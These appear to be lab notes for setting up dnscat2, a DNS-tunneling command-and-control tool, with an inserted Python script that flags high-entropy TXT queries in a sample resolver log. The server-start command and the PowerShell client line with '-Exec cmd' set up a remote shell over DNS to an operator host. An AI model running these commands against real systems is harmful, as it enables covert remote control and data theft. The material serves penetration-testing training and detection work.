DNScat2

Tunneling tool that sends data through an encrypted C2 channel over DNS. The data is carried inside DNS TXT records, so it passes through whatever resolver the client is allowed to use.
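From the defender's side, the observable side effect of a TXT-record tunnel like the one above is a burst of TXT queries to one zone whose leftmost labels are long and high-entropy. The script below, added here as an illustration and not part of dnscat2 or these notes, scores a constructed resolver log for that pattern; the log line format, the thresholds and the "zone is the last two labels" heuristic are all assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed sample resolver log (not real traffic): "<client> <qtype> <qname>".
# The first three lines mimic the tunnel described above: repeated TXT lookups
# for long, hex-looking labels under one attacker-controlled zone.
SAMPLE_LOG = """\
10.10.14.5 TXT 7b7e0f5c1a2d9e3f4b6a8c0d1e2f3a4b.5c6d7e8f9a0b1c2d3e4f.tunnel.example
10.10.14.5 TXT 2c9f4e1b8d7a6f5e4d3c2b1a0f9e8d7c.6b5a4f3e2d1c0b9a8f7e.tunnel.example
10.10.14.5 TXT 9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b.3a2f1e0d9c8b7a6f5e4d.tunnel.example
10.10.14.7 A www.example.com
10.10.14.7 TXT _dmarc.example.com
10.10.14.7 TXT _dmarc.partner.example
"""

def shannon_entropy(s):
    """Bits per character: hex-encoded data sits near 4.0, real hostnames far lower."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def parse_line(line):
    client, qtype, qname = line.split()
    labels = qname.rstrip(".").lower().split(".")
    # Assumption: the zone is the last two labels. Production code should use a
    # public-suffix list so that e.g. "co.uk" is not mistaken for a zone.
    zone = ".".join(labels[-2:])
    payload = ".".join(labels[:-2])  # whatever the client placed in front of the zone
    return client, qtype, zone, payload

def score_zones(log_text, min_txt=3, min_payload_len=40, min_entropy=3.0):
    """Return zones whose TXT queries look like an encoded data channel."""
    stats = defaultdict(lambda: {"txt": 0, "len": 0, "ent": 0.0})
    for line in filter(str.strip, log_text.splitlines()):
        _, qtype, zone, payload = parse_line(line)
        if qtype != "TXT":
            continue
        s = stats[zone]
        s["txt"] += 1
        s["len"] += len(payload)
        s["ent"] += shannon_entropy(payload.replace(".", ""))
    flagged = {}
    for zone, s in stats.items():
        avg_len, avg_ent = s["len"] / s["txt"], s["ent"] / s["txt"]
        if s["txt"] >= min_txt and avg_len >= min_payload_len and avg_ent >= min_entropy:
            flagged[zone] = {"txt_queries": s["txt"],
                             "avg_payload_len": round(avg_len, 1),
                             "avg_entropy": round(avg_ent, 2)}
    return flagged
```

dnscat2 can also be configured to use record types other than TXT, so in practice apply the same length, entropy and rate heuristics across all query types and tune the thresholds against your own resolver baseline.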

Setting up dnscat2

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ sudo gem install bundler
$ bundle install

Starting the dnscat2 server

$ sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

After the server starts, take note of the pre-shared secret it prints; the client must supply the same value.

Importing dnscat2.ps1

$ git clone https://github.com/lukebaggett/dnscat2-powershell.git

Transfer dnscat2.ps1 to the Windows target, then import it and start the client:

PS C:\htb> Import-Module .\dnscat2.ps1
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

dnscat2 commands

dnscat2> ?

Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows

Interacting with the established sessions

dnscat2> window -i 1
